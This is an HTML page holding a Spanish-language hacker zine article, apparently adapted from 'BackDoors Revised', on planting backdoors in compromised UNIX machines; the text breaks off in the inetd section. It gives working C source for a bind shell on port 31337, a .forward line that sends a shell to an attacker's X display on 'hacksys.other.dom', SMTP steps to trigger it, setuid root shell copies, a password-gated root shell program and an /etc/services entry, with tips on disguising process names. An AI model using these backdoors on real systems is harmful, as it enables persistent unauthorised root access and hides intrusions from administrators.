<!doctype html public "-//w3c//dtd html 4.0 transitional//en">
<html>
<head>
   <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
   <meta name="Author" content="Miguel Angel Nieto">
   <meta name="GENERATOR" content="Mozilla/4.72 [en] (Win98; I) [Netscape]">
   <title>BackDoors</title>
</head>
<body text="#FFFFFF" bgcolor="#FFFFFF" link="#FFCC00" vlink="#FFCC00" alink="#FFCC00" background="backmain.gif">

<center><b><i><font face="Arial,Helvetica"><font size=+4>BACKDOORS</font></font></i></b></center>
<font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Este texto es una adaptacion/traduccion
del articulo 'BackDoors Revised' publicado en la Confidence Remains High
n.3 escrito por Blk-Majik (Menuo nick XDDDD ). He a~adido algunas backdoors,
he modificao otras y he kitao otras. Osea, ke este texto tambien tiene
algo mio.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Utiliza este texto de manera
responsable: Osea, ke te sirva pa asegurar algun hack :)</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><b><font face="Arial,Helvetica"><font color="#FFCC00"><font size=-1>Introducion:</font></font></font></b><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>COMO? , si esperas ke me
enrolle a escribir, la llevas clara .... No me gusta escribir, asiske ....,
si tienes 'alguna' duda me escribes, si no entiendes casi na, olvidalo
tio.... (Ke RADIKAL XDDDD)</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><b><font face="Arial,Helvetica"><font color="#FFCC00"><font size=-1>Ke
es una backdoor?</font></font></font></b><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Puessss,....., es una 'Puerta
trasera' ke sirve pa volver a entrar a una makina hackeada en caso de ke
te kiten el acceso normal, tb se le llama asi a lo ke dejas en una makina
para asegurarte el root.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Una cosa debe estar clara,
a~adir un usuario con :0:0: es de lamers, ya ke se detecta como na!,y no
solo por el root, tb por otro hacker (yo he encontrao :0:0: SIN PASSWORD!!!
Algun lamer .. ).</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>He de reconocer ke yo tengo
una cta asi (pero kon pass), pero porke nadie aparece por esa makina desde
hace a~os, osea ke no me preocupa.</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><b><font face="Arial,Helvetica"><font color="#FFCC00"><font size=-1>Ke
necesito pa poner una backdoor?</font></font></font></b><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Una makina donde ponerla
(osea login y pass), de momento, con esto solo te basta pa poner alguna
backdoor, tb es verdad ke kon eso ... poco mas ke komerte los mocos.</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Nene!!, trabaja un poco y
conviertete en root.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp; *Por cierto, por si
no te habias dao cuenta, me refiero a backdoors para sistemas basados en
UNIX.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><b><font face="Arial,Helvetica"><font color="#FFCC00"><font size=-1>Bien,
veamos esas backdoors:</font></font></font></b><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1><b><font color="#FFCC00">&nbsp;
1-</font></b> Pa poner esta backdoor, con solo ser un simple usuario basta,
consiste en un simple programita en C, ke al ejecutarlo se keda ejecutando
en segundo plano residente, este programita es un servidor, e.d. atiende
un puerto, cuando alguien se conesta a ese puerto,el servidor atiende a
ese 'alguien', ejecuta una shell y deja ke ese alguien interactue (los
gurus&nbsp; de linux me mataran al ver komo explico esto) con esa shell,
osea, komo si estuviera dentro, eso si, sin dejar logs (esto es bueno),una
cosa ke no debeis olvidar, es poner al final de cada linea un ';' (no voy
a explicar porque).</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
Pa ke lo entiendas:</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
cat /etc/passwd&nbsp; -pasa a ser-&nbsp;&nbsp; cat /etc/passwd;</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Se ejecuta el comando y depues
dara un error,&nbsp; pasa de el, komo yo paso de vosotros ..... ( Y MAS,
Y MAS, Y MAS RADIKAL XDDDDD. ME RULO!!!!)</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Evidentemente, esta backdoor
no es muy recomendable ya ke se ve con un simple 'ps', ademas, cuando el
servidor ejecuta la shell lo hace como akel ke ha ejecutao el programa,
osea ke si&nbsp; pones esta backdoor sin ser root, solo te aseguras el
acceso como usuario, bueno ... algo es algo.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;
<i>El programa en cuestion:</i></font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&lt;++> set_017/backdoors/back1.c</font></font>
<br><font face="Arial,Helvetica"><font size=-1>/* quick thingy... bind
a shell to a socket... defaults to port 31337 */</font></font>
<br><font face="Arial,Helvetica"><font size=-1>/* code by pluvius@io.org&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
*/</font></font>
<br><font face="Arial,Helvetica"><font size=-1>/* don't forget.. when you
connect to the port.. commands are like:&nbsp;&nbsp; */</font></font>
<br><font face="Arial,Helvetica"><font size=-1>/* "ls -l;" or "exit;" (don't
forget the ';')&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
*/</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#define PORT 31337</font></font>
<br><font face="Arial,Helvetica"><font size=-1>#include &lt;stdio.h></font></font>
<br><font face="Arial,Helvetica"><font size=-1>#include &lt;signal.h></font></font>
<br><font face="Arial,Helvetica"><font size=-1>#include &lt;sys/types.h></font></font>
<br><font face="Arial,Helvetica"><font size=-1>#include &lt;sys/socket.h></font></font>
<br><font face="Arial,Helvetica"><font size=-1>#include &lt;netinet/in.h></font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>int soc_des, soc_cli, soc_rc,
soc_len, server_pid, cli_pid;</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>struct sockaddr_in serv_addr;
struct sockaddr_in client_addr;</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>int main ()</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;{</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>soc_des = socket(AF_INET,
SOCK_STREAM, IPPROTO_TCP);</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>if (soc_des == -1) exit(-1);</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>bzero((char *) &amp;serv_addr,
sizeof(serv_addr));</font></font>
<br><font face="Arial,Helvetica"><font size=-1>serv_addr.sin_family = AF_INET;</font></font>
<br><font face="Arial,Helvetica"><font size=-1>serv_addr.sin_addr.s_addr
= htonl(INADDR_ANY);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>serv_addr.sin_port = htons(PORT);</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>soc_rc = bind(soc_des, (struct
sockaddr *) &amp;serv_addr, sizeof(serv_addr));</font></font>
<br><font face="Arial,Helvetica"><font size=-1>if (soc_rc != 0) exit(-1);</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>if (fork() != 0)&nbsp; exit(0);</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>setpgrp();</font></font>
<br><font face="Arial,Helvetica"><font size=-1>signal(SIGHUP, SIG_IGN);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>if (fork() != 0) exit(0);</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>soc_rc = listen(soc_des,
5);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>if (soc_rc != 0) exit(0);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>while (1)</font></font>
<br><font face="Arial,Helvetica"><font size=-1>{</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
soc_len = sizeof(client_addr);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
soc_cli = accept(soc_des, (struct sockaddr *) &amp;client_addr,&amp;soc_len);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
if (soc_cli &lt; 0) exit(0);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
cli_pid = getpid();</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
server_pid = fork();</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
if (server_pid != 0)</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
{</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
dup2(soc_cli,0);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
dup2(soc_cli,1);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp; dup2(soc_cli,2);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
execl("/bin/sh","sh",(char *)0);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
close(soc_cli);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp; exit(0);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
}</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;close(soc_cli);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>}</font></font>
<br><font face="Arial,Helvetica"><font size=-1>}</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&lt;--></font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;*NOTA:&nbsp; Pa los
pocos espabilados: Para&nbsp; ke no te vean el programa al primer ps ke
haga alguien ponle un nombre que no resalte musso, como 'bash','chfn' o
algo asi ..., vamos, no le pongas 'mi_backdoor'.</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;</font></font>
<br><font face="Arial,Helvetica"><font size=-1>Mejoras:&nbsp; lo malo de
esta backdoor es ke kualkiera ke haga telnet ha ese puerto entrara, la
mejora puede ser&nbsp; ke pida un password exclusivo (osea ke no este en
el /etc/passwd) y asi solo tu podras entrar por ese puerto. Si alguien
tiene la ocurrencia de hacerlo, por favor, ke me lo mande.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1><b><font color="#FFCC00">2-
.forward</font></b>, Esta backdoor es mu chuli, con esta te aseguras el
acceso, consiste en modificar el .forward de un usuario (si es el root
cojonudo ya ke entrarias como root), el .foward es un fichero ke usa el
mail, cuando ese usuario reciba algun mail hara lo ke el .forward ponga
ke tiene ke hacer, responder , ejecutar comandos, etc .... }:)</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp; <font color="#FFFFFF">Osea,
cuando este en una makina pon:</font></font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>echo \username >> ~/.forward</font></font>
<br><font face="Arial,Helvetica"><font size=-1>echo&nbsp; |"/usr/local/X11/bin/xterm
-display hacksys.other.dom:0.0 -e /bin/sh"</font></font>
<br><font face="Arial,Helvetica"><font size=-1>>>~/.forward</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Esto te abrira una ventana&nbsp;
de X-windows, pero antes debes de poner 'xhost +victima.gov' en un makina
para permitir ke se te abra una ventana en tu sistema desde victima.gov.
Por supuesto debes de estar en X-windows</font></font>
<br><font face="Arial,Helvetica"><font size=-1>(por si acaso ...).</font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Ten en cuenta, de ke si mandas
correo asi:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;mail tontodelculo@victima.gov</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Tardara un tiempo en llegar,
por lo tanto tardara un tiempo en ejecutarse lo ke pongas en el .forward,
para solventar este problema, haz:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;telnet victima.gov
25</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;HELO kojones.net</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;MAIL FROM: tutankamon</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;RCPT TO: username</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;DATA</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;Hola ......</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;Soy Edu, Feliz Navidad!!!!</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;.</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;QUIT</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Y ya esta ... asi le llegara
el mail casi instantaneamente.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>La verdad es ke hay mejores
opciones, ya ke esto lo ejecutaria cada vez ke ese usuario recibiera mail,
bueno, tu eres el encargado de aprovechar esta backdoor. Tambien recuerda
en borrar el mail kuando entres o simplemente no mandarle un mail sospechoso
para ke no sospeche.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Otra cosa ...... si no tienes
IP fija lo anterior de la xterm no te serviraye ke cada vez tendras una
IP distinta.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>A partir de ahora,para poner
las siguientes backdoors, debes de ser root, :( asiske ya sabeis...</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1><b><font color="#FFCC00">3-
Un sushi</font></b>, esto es una backdoor para mantener el root, pero para
conseguirlo una vez dentro, osea, es copiar una shell (por ejemplo /bin/sh)
con un nombre ke no llame la atencion y como root ponerle los permisos
4755, es decir, ke cualkiera pueda ejecutar esa shell&nbsp; con los permisos
del root osea:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp;#cp /bin/sh /bin/fwalld</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;#chmod 4755 /bin/fwalld</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Si como un usuario normal
ejecutas /bin/fwalld .. :) . Lo malo del sushi es ke si otro lo encuentra
y&nbsp; lo ejecuta tambien se hace root, esto se puede mejorar poniendo
un sushi seguro, esto es, un programa ke te pide password antes de ejecutar
el shell. Aki muestro uno ke he hecho yo, pero, lo pongo solo pa ke veas
como es no para ke lo copies,lo subas y ya tienes backdoor, porque para
eso te subes otras backdoors mejores ke hay (rootkits por ejemplo), pongo
el programa para ke lo veas (si lo kieres usar usalo, a mi me da igual)
y aprendas ha hacer uno (se hace en 3min.) para ponertelo, osea, si no
tienes tiempo para ponerte a instalar un rootkit&nbsp; vas con el 'vi'
mismo escribes el programa lo compilas (recuerda: chmod 4711 &lt;programa>)
y lo dejas alli para cuando tengas tiempo de instalar el rootkit u otra
backdoor mejor.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Es importante ke sepas programar
en C en este mundillo, asiske si no sabes, deja de poner backdoors&nbsp;
y estudia.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>El codigo fuente:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&lt;++> set_017/backdoors/sushi.c</font></font>
<br><font face="Arial,Helvetica"><font size=-1>/* Sushi Seguro</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;* por Fuego Fatuo
(La KaTeDral)</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;*</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;* El programa se puede&nbsp;
mejorar encriptando el password</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;* yo personalmente
notengo ninguna gana de molestarme,</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;* si alguien desea
hacerlo, por favor,que me mande una copia</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;*/</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>#include &lt;stdio.h></font></font>
<br><font face="Arial,Helvetica"><font size=-1>#include &lt;stdlib.h></font></font>
<br><font face="Arial,Helvetica"><font size=-1>#define secret_passwd "mipass12\0"</font></font>
<br><font face="Arial,Helvetica"><font size=-1>main (void)</font></font>
<br><font face="Arial,Helvetica"><font size=-1>{</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp; char *key;</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp; key =(char
*)(getpass ("Password:"));</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp; if (!strcmp(key,secret_passwd))</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;
{</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;setuid(0);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;setgid(0);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;seteuid(0);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;setegid(0);</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;system("/bin/sh");</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp;&nbsp;&nbsp;&nbsp;
}</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp; }</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&lt;--></font></font>
<br><font face="Arial,Helvetica"><font size=-1></font></font>&nbsp;<font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Compila el programa, dale
permisos 4711 y ya esta, no hace falta ke copies la shell. Por supuesto
el programa se puede mejorar de mil maneras, si te molestas en hacerlo,
mandame una copia.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1><b><font color="#FFCC00">4-
Inetd.</font></b> Esta es una de las mas usadas (SI NO LA KE MAS....).</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Un POCO de explicacion previa.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>El inetd es un 'programilla'
ke escucha los puertos de una makina, entonses, cuando alguien conesta
a un puerto determinao, el inetd ejecuta el demonio asociao a ese puerto.
Bien lo primero: abre un puerto, pa esto esta el fichero /etc/services.</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>ok, en el /etc/services vas
a ver algo asi:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>tcpmux&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
1/tcp&nbsp;&nbsp;&nbsp; #TCP Port Service Multiplexer</font></font>
<br><font face="Arial,Helvetica"><font size=-1>tcpmux&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
1/udp&nbsp;&nbsp;&nbsp; #TCP Port Service Multiplexer</font></font>
<br><font face="Arial,Helvetica"><font size=-1>compressnet&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
2/tcp&nbsp;&nbsp;&nbsp; #Management Utility</font></font>
<br><font face="Arial,Helvetica"><font size=-1>compressnet&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
2/udp&nbsp;&nbsp;&nbsp; #Management Utility</font></font>
<br><font face="Arial,Helvetica"><font size=-1>compressnet&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
3/tcp&nbsp;&nbsp;&nbsp; #Compression Process</font></font>
<br><font face="Arial,Helvetica"><font size=-1>compressnet&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
3/udp&nbsp;&nbsp;&nbsp; #Compression Process</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Ke cojones es esto?</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>ftp&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
21/tcp&nbsp;&nbsp;&nbsp; #File Transfer [Control]</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>[1]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
[2]/[3]&nbsp;&nbsp;&nbsp; #[&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
4&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ]</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp; 1: Nombre del servicio</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp; 2: Puerto ke usa
el sistema pa ese servicio</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp; 3: El protocolo,
puede ser tcp o udp, nosotros pondremos el tcp</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp; 4: Descripcion de
lo ke hase ese servicio</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Bien, eso kiere decir ke
esta abierto el puerto 21, y le ha dao el nombre de ftp. Pos nosotros a~adiremos
otra linea mas o menos del mismo estilo, pa abrir el puerto, el numero/nombre
del servicio no debe llamar la atencion, fijate, ke el numero/nombre del
puerto no este ya en uso. Un puerto ke por ejemplo no se suele usar es
el 26, bien pongamos algo asi:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>fwalld&nbsp;&nbsp; 26/tcp&nbsp;&nbsp;
#Firewall daemon</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Ahora, tenemos ke konfigurar
el inetd pa ke ejecute una shell cuando alguien se coneste a ese puerto.
Esto se hace en el fichero /etc/inetd.conf , antes de na, hechemosle un
vistazo:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Veras algo asi:</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>ftp&nbsp;&nbsp;&nbsp;&nbsp;
stream&nbsp; tcp&nbsp;&nbsp;&nbsp;&nbsp; nowait&nbsp; root&nbsp;&nbsp;&nbsp;
/usr/libexec/tcpd&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ftpd -l -A</font></font>
<br><font face="Arial,Helvetica"><font size=-1>telnet&nbsp; stream&nbsp;
tcp&nbsp;&nbsp;&nbsp;&nbsp; nowait&nbsp; root&nbsp;&nbsp;&nbsp; /usr/libexec/tcpd&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
telnetd</font></font>
<br><font face="Arial,Helvetica"><font size=-1>shell&nbsp;&nbsp; stream&nbsp;
tcp&nbsp;&nbsp;&nbsp;&nbsp; nowait&nbsp; root&nbsp;&nbsp;&nbsp; /usr/libexec/tcpd&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
rshd</font></font>
<br><font face="Arial,Helvetica"><font size=-1>login&nbsp;&nbsp; stream&nbsp;
tcp&nbsp;&nbsp;&nbsp;&nbsp; nowait&nbsp; root&nbsp;&nbsp;&nbsp; /usr/libexec/tcpd&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
rlogind -a</font></font>
<br><font face="Arial,Helvetica"><font size=-1>exec&nbsp;&nbsp;&nbsp; stream&nbsp;
tcp&nbsp;&nbsp;&nbsp;&nbsp; nowait&nbsp; root&nbsp;&nbsp;&nbsp; /usr/libexec/tcpd&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
rexecd</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>Que significa esto?</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>ftp&nbsp;&nbsp;&nbsp;&nbsp;
stream&nbsp; tcp&nbsp;&nbsp;&nbsp;&nbsp; nowait&nbsp; root&nbsp;&nbsp;&nbsp;
/usr/libexec/tcpd&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; ftpd -l -A</font></font>
<br><font face="Arial,Helvetica"><font size=-1>[1]&nbsp;&nbsp;&nbsp;&nbsp;
[&nbsp; 2&nbsp; ] [3]&nbsp;&nbsp;&nbsp;&nbsp; [&nbsp; 4 ]&nbsp; [ 5 ]&nbsp;&nbsp;
[&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; 6&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;
]&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; [&nbsp;&nbsp;&nbsp; 7&nbsp;&nbsp;&nbsp;
]</font></font><font face="Arial,Helvetica"><font size=-1></font></font>
<p><font face="Arial,Helvetica"><font size=-1>&nbsp; 1: Nombre del servicio
en el /etc/services.</font></font>
<br><font face="Arial,Helvetica"><font size=-1>&nbsp; 2: Tipo de conexion
ke utiliza el servicio</font></font>
